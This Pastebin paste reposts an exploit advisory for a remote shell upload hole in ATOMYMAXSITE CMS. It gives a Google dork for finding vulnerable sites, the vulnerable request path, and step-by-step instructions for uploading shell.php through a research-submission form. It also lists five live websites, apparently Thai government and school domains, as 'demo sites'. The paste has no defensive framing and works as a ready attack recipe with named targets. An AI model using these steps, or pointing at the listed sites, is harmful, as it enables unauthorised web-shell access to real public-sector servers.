3xploit3r

ATOMYMAXSITE CMS Remote Shell Upload Vulnerability

Aug 9th, 2016
397
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. ,------. ,--. ,-----. ,--.
  3. | .-. \ ,---. ,--,--. ,-| | ,---. ' .-. ',--.,--.| |
  4. | | \ :| .-. :' ,-. |' .-. |( .-' | | | || || || |
  5. | '--' /\ --.\ '-' |\ `-' |.-' `)' '-' '' '' '| |
  6. `-------' `----' `--`--' `---' `----' `-----' `----' `--'
  7.  
  8. # [+] Exploit Title: ATOMYMAXSITE CMS Remote Shell Upload Vulnerability
  9. # [+] Google Dork: "Powered by ATOMYMAXSITE"
  10. # [+] Date: 30/06/2013
  11. # [+] Exploit Author: Iranian_Dark_Coders_Team
  12. # [+] Vendor Homepage: http://board.maxsitepro.com
  13. # [+] Version: All Version [1.50 - 2.5]
  14. # [+] Tested on: Windows 7
  15. #
  16. #######################################################
  17. #
  18. # [+] Exploit:
  19. #
  20. # [+] http://localhost/[path]/index.php?name=research&file=add&op=research_add
  21. #
  22. #######################################################
  23. #
  24. # [+] Proof:
  25. #
  26. # [+] http://localhost/[path]/index.php?name=research&file=add&op=research_add
  27. # [+] Then fill in all the information requested
  28. # [+] Now click on the Browse front of ผลงานฉบับเต็ม(Fultext) and select shell.php
  29. # [+] Now click on the button below the form to be registered
  30. # [+] http://localhost/[path]/index.php?name=research
  31. # [+] Now select the first record and click the (FullText)
  32. # [+] (FullText) = Path shell.php
  33. #
  34. #######################################################
  35. #
  36. # [+] Demo site:
  37. #
  38. # [+] http://plan.chon1.go.th
  39. # [+] http://tbacud.ac.th
  40. # [+] http://www.nitedcpm1.net
  41. # [+] http://ict.chon1.go.th/home/
  42. # [+] http://www.chiangdaocity.go.th/home
  43.  
  44. ./s0ul
Advertisement
Add Comment
Please, Sign In to add comment